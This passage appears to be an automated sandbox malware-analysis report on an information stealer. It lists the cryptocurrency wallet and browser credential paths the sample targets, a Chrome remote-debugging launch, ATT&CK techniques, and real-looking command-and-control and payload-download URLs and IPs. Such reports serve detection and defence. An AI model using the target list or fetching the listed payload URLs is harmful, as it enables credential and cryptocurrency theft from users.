Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: E89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001612000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-walJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shmJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
              Source: Yara matchFile source: 00000000.00000002.2588765991.0000000000C1C000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: E89hSGjVrv.exe PID: 5480, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: C:\Users\user\Desktop\E89hSGjVrv.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
              Source: Yara matchFile source: 00000000.00000003.2073713588.0000000005520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2593879213.00000000015EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2588765991.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: E89hSGjVrv.exe PID: 5480, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: Process Memory Space: E89hSGjVrv.exe PID: 5480, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Scheduled Task/Job
              1
              Scheduled Task/Job
              12
              Process Injection
              121
              Masquerading
              2
              OS Credential Dumping
              1
              Query Registry
              Remote Services1
              Email Collection
              1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Registry Run Keys / Startup Folder
              1
              Scheduled Task/Job
              1
              Disable or Modify Tools
              LSASS Memory631
              Security Software Discovery
              Remote Desktop Protocol4
              Data from Local System
              1
              Remote Access Software
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAt1
              DLL Side-Loading
              1
              Registry Run Keys / Startup Folder
              241
              Virtualization/Sandbox Evasion
              Security Account Manager2
              Process Discovery
              SMB/Windows Admin SharesData from Network Shared Drive11
              Ingress Tool Transfer
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              DLL Side-Loading
              12
              Process Injection
              NTDS241
              Virtualization/Sandbox Evasion
              Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
              Extra Window Memory Injection
              1
              Obfuscated Files or Information
              LSA Secrets2
              File and Directory Discovery
              SSHKeylogging114
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
              Software Packing
              Cached Domain Credentials224
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              DLL Side-Loading
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              Extra Window Memory Injection
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 1559850 Sample: E89hSGjVrv.exe Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 85 Suricata IDS alerts for network traffic 2->85 87 Found malware configuration 2->87 89 Antivirus detection for URL or domain 2->89 91 10 other signatures 2->91 8 E89hSGjVrv.exe 37 2->8         started        13 skotes.exe 2->13         started        15 skotes.exe 2->15         started        17 msedge.exe 632 2->17         started        process3 dnsIp4 59 185.215.113.16, 49901, 80 WHOLESALECONNECTIONSNL Portugal 8->59 61 185.215.113.206, 49704, 49728, 49773 WHOLESALECONNECTIONSNL Portugal 8->61 63 127.0.0.1 unknown unknown 8->63 51 C:\Users\user\DocumentsCAFHDBGHJK.exe, PE32 8->51 dropped 53 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 8->53 dropped 55 C:\Users\user\AppData\...\softokn3[1].dll, PE32 8->55 dropped 57 11 other files (none is malicious) 8->57 dropped 103 Attempt to bypass Chrome Application-Bound Encryption 8->103 105 Drops PE files to the document folder of the user 8->105 107 Tries to steal Mail credentials (via file / registry access) 8->107 119 7 other signatures 8->119 19 cmd.exe 8->19         started        21 msedge.exe 2 10 8->21         started        24 chrome.exe 8 8->24         started        109 Tries to detect sandboxes and other dynamic analysis tools (window names) 13->109 111 Tries to evade debugger and weak emulator (self modifying code) 13->111 113 Hides threads from debuggers 13->113 65 185.215.113.43 WHOLESALECONNECTIONSNL Portugal 15->65 67 31.41.244.11 AEROEXPRESS-ASRU Russian Federation 15->67 115 Tries to detect sandboxes / dynamic malware analysis system (registry check) 15->115 117 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 15->117 27 msedge.exe 17->27         started        29 msedge.exe 17->29         started        31 msedge.exe 17->31         started        33 msedge.exe 17->33         started        file5 signatures6 process7 dnsIp8 35 DocumentsCAFHDBGHJK.exe 19->35         started        39 conhost.exe 19->39         started        101 Monitors registry run keys for changes 21->101 41 msedge.exe 21->41         started        69 192.168.2.5, 443, 49703, 49704 unknown unknown 24->69 71 239.255.255.250 unknown Reserved 24->71 43 chrome.exe 24->43         started        73 13.107.246.40, 443, 49846, 49847 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 27->73 75 s-part-0017.t-0009.t-msedge.net 13.107.246.45, 443, 49719, 49732 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 27->75 77 25 other IPs or domains 27->77 signatures9 process10 dnsIp11 49 C:\Users\user\AppData\Local\...\skotes.exe, PE32 35->49 dropped 93 Tries to evade debugger and weak emulator (self modifying code) 35->93 95 Tries to detect virtualization through RDTSC time measurements 35->95 97 Hides threads from debuggers 35->97 99 2 other signatures 35->99 46 skotes.exe 35->46         started        79 plus.l.google.com 142.250.185.206, 443, 49730 GOOGLEUS United States 43->79 81 www.google.com 142.250.185.228, 443, 49706, 49707 GOOGLEUS United States 43->81 83 2 other IPs or domains 43->83 file12 signatures13 process14 signatures15 121 Hides threads from debuggers 46->121 123 Tries to detect sandboxes / dynamic malware analysis system (registry check) 46->123 125 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 46->125

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              E89hSGjVrv.exe83%ReversingLabsWin32.Trojan.Multiverze
              E89hSGjVrv.exe100%AviraTR/Crypt.TPM.Gen
              E89hSGjVrv.exe100%Joe Sandbox ML
              SourceDetectionScannerLabelLink
              C:\ProgramData\freebl3.dll0%ReversingLabs
              C:\ProgramData\mozglue.dll0%ReversingLabs
              C:\ProgramData\msvcp140.dll0%ReversingLabs
              C:\ProgramData\nss3.dll0%ReversingLabs
              C:\ProgramData\softokn3.dll0%ReversingLabs
              C:\ProgramData\vcruntime140.dll0%ReversingLabs
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll0%ReversingLabs
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll0%ReversingLabs
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll0%ReversingLabs
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll0%ReversingLabs
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll0%ReversingLabs
              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              http://31.41.244.11/files/random.exe$100%Avira URL Cloudphishing
              http://31.41.244.11/files/random.exe07797001100%Avira URL Cloudphishing
              http://185.215.113.206/68b591d6548ec281/freebl3.dllK100%Avira URL Cloudmalware
              http://31.41.244.11/files/random.exe1100%Avira URL Cloudphishing
              http://31.41.244.11/100%Avira URL Cloudphishing
              http://31.41.244.11/215.113.43/Zu7JuNko/index.php100%Avira URL Cloudphishing
              http://31.41.244.11/files/random.exephp100%Avira URL Cloudphishing
              http://185.215.113.206/68b591d6548ec281/nss3.dllO100%Avira URL Cloudmalware
              http://185.215.113.206/68b591d6548ec281/freebl3.dllo100%Avira URL Cloudmalware
              NameIPActiveMaliciousAntivirus DetectionReputation
              chrome.cloudflare-dns.com
              172.64.41.3
              truefalse
                high
                plus.l.google.com
                142.250.185.206
                truefalse
                  high
                  play.google.com
                  142.250.186.46
                  truefalse
                    high
                    ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                    94.245.104.56
                    truefalse
                      high
                      sb.scorecardresearch.com
                      13.32.99.105
                      truefalse
                        high
                        s-part-0017.t-0009.t-msedge.net
                        13.107.246.45
                        truefalse
                          high
                          www.google.com
                          142.250.185.228
                          truefalse
                            high
                            googlehosted.l.googleusercontent.com
                            172.217.18.1
                            truefalse
                              high
                              sni1gl.wpc.nucdn.net
                              152.199.21.175
                              truefalse
                                high
                                clients2.googleusercontent.com
                                unknown
                                unknownfalse
                                  high
                                  bzib.nelreports.net
                                  unknown
                                  unknownfalse
                                    high
                                    assets.msn.com
                                    unknown
                                    unknownfalse
                                      high
                                      c.msn.com
                                      unknown
                                      unknownfalse
                                        high
                                        ntp.msn.com
                                        unknown
                                        unknownfalse
                                          high
                                          apis.google.com
                                          unknown
                                          unknownfalse
                                            high
                                            api.msn.com
                                            unknown
                                            unknownfalse
                                              high
                                              NameMaliciousAntivirus DetectionReputation
                                              http://185.215.113.206/68b591d6548ec281/softokn3.dllfalse
                                                high
                                                http://185.215.113.206/false
                                                  high
                                                  https://c.msn.com/c.gif?rnd=1732146580940&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=2be22f69e21a49cfaf6226b272c6f5bf&activityId=2be22f69e21a49cfaf6226b272c6f5bf&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=98AF16FA7EF64DBE97659D03ACE375C9&MUID=02AF36CE75CE647F00F523F374AC6592false
                                                    high
                                                    http://185.215.113.43/Zu7JuNko/index.phpfalse
                                                      high
                                                      http://185.215.113.206/68b591d6548ec281/freebl3.dllfalse
                                                        high
                                                        http://185.215.113.206/68b591d6548ec281/nss3.dllfalse
                                                          high
                                                          https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0false
                                                            high
                                                            https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732146588118&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                              high
                                                              https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732146580938&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                                high
                                                                185.215.113.206/c4becf79229cb002.phpfalse
                                                                  high
                                                                  https://sb.scorecardresearch.com/b?rn=1732146580940&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=02AF36CE75CE647F00F523F374AC6592&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                                                    high
                                                                    http://185.215.113.206/68b591d6548ec281/vcruntime140.dllfalse
                                                                      high
                                                                      https://clients2.googleusercontent.com/crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crxfalse
                                                                        high
                                                                        http://185.215.113.16/mine/random.exefalse
                                                                          high
                                                                          http://185.215.113.206/68b591d6548ec281/sqlite3.dllfalse
                                                                            high
                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                            http://185.215.113.206/68b591d6548ec281/freebl3.dllKE89hSGjVrv.exe, 00000000.00000002.2593879213.0000000001627000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: malware
                                                                            unknown
                                                                            https://duckduckgo.com/chrome_newtabE89hSGjVrv.exe, 00000000.00000003.2361209484.0000000023E9C000.00000004.00000020.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000003.2265234379.0000000001680000.00000004.00000020.00020000.00000000.sdmp, BFBGDGID.0.dr, Web Data.8.dr, GIJJKKJJ.0.drfalse
                                                                              high
                                                                              https://c.msn.com/2cc80dabc69f58b6_1.8.drfalse
                                                                                high
                                                                                https://duckduckgo.com/ac/?q=E89hSGjVrv.exe, 00000000.00000003.2361209484.0000000023E9C000.00000004.00000020.00020000.00000000.sdmp, E89hSGjVrv.exe, 00000000.00000003.2265234379.0000000001680000.00000004.00000020.00020000.00000000.sdmp, BFBGDGID.0.dr, Web Data.8.dr, GIJJKKJJ.0.drfalse
                                                                                  high
                                                                                  http://www.broofa.comchromecache_467.4.drfalse
                                                                                    high
                                                                                    https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshorelined26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                      high
                                                                                      http://31.41.244.11/files/random.exe$skotes.exe, 00000018.00000002.3301990970.0000000000C28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: phishing
                                                                                      unknown
                                                                                      https://ntp.msn.com/0000003.log9.8.drfalse
                                                                                        high
                                                                                        https://ntp.msn.com/_defaultQuotaManager.8.drfalse
                                                                                          high
                                                                                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.E89hSGjVrv.exe, 00000000.00000002.2617610604.0000000023EF1000.00000004.00000020.00020000.00000000.sdmp, IDHIEBAAKJDHIECAAFHC.0.drfalse
                                                                                            high
                                                                                            https://www.last.fm/d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                              high
                                                                                              https://deff.nelreports.net/api/report?cat=msn2cc80dabc69f58b6_0.8.drfalse
                                                                                                high
                                                                                                https://ntp.msn.cn/edge/ntp2cc80dabc69f58b6_1.8.drfalse
                                                                                                  high
                                                                                                  https://sb.scorecardresearch.com/2cc80dabc69f58b6_1.8.drfalse
                                                                                                    high
                                                                                                    http://31.41.244.11/files/random.exe1skotes.exe, 00000018.00000002.3301990970.0000000000C41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • Avira URL Cloud: phishing
                                                                                                    unknown
                                                                                                    https://docs.google.com/manifest.json.8.drfalse
                                                                                                      high
                                                                                                      https://www.youtube.comd26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                                        high
                                                                                                        http://31.41.244.11/skotes.exe, 00000018.00000002.3301990970.0000000000C28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: phishing
                                                                                                        unknown
                                                                                                        https://www.instagram.comd26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                                          high
                                                                                                          https://web.skype.com/?browsername=edge_canary_shorelined26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                                            high
                                                                                                            https://drive.google.com/manifest.json.8.drfalse
                                                                                                              high
                                                                                                              https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                                                high
                                                                                                                https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2d26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                                                  high
                                                                                                                  https://www.messenger.comd26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                                                    high
                                                                                                                    https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedged26454f9-efdb-4082-a4ed-6c5e60c7ffb4.tmp.8.drfalse
                                                                                                                      high
